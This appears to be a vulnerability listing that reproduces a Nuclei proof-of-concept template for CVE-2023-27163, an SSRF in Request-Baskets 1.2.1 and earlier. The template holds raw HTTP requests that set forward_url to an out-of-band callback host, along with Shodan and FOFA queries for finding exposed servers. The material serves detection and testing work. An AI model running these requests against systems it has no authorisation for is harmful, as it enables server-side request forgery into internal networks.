漏洞描述
Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
CVE-2023-27163: Request-Baskets <= 1.2.1 - Server Side Request Forgery
PoC代码[已公开]
id: CVE-2023-27163
info:
name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
author: Jaenact
severity: medium
description: |
Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
reference:
- https://github.com/darklynx/request-baskets
- https://hub.docker.com/r/darklynx/request-baskets
- https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424
- https://nvd.nist.gov/vuln/detail/CVE-2023-27163
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
cvss-score: 6.5
cve-id: CVE-2023-27163
epss-score: 0.92769
epss-percentile: 0.9975
cwe-id: CWE-918
cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: darklynx
product: request-baskets
shodan-query: http.html:"Request-Baskets"
fofa-query: body="Request-Baskets"
tags: cve,cve2023,ssrf,request-baskets,oast,proxy
flow: http(1) && http(2)
variables:
bucketname: "{{rand_base(7)}}"
http:
- raw:
- |
POST /api/baskets/{{bucketname}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"forward_url": "http://{{interactsh-url}}",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
matchers:
- type: dsl
dsl:
- 'status_code == 201'
- 'contains(body, "token\":")'
- 'contains(content_type, "application/json")'
condition: and
internal: true
- raw:
- |
GET /{{bucketname}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4a0a0047304502207b3919a01ceafbfb75de15aaefaa8ee147948d5d08eeacf09590e9c9c704b21f02210092451f19154d5b475657205ac43e464f57622007a87aeab89970be6134b8a09d:922c64590222798bb761d5b6d8e72950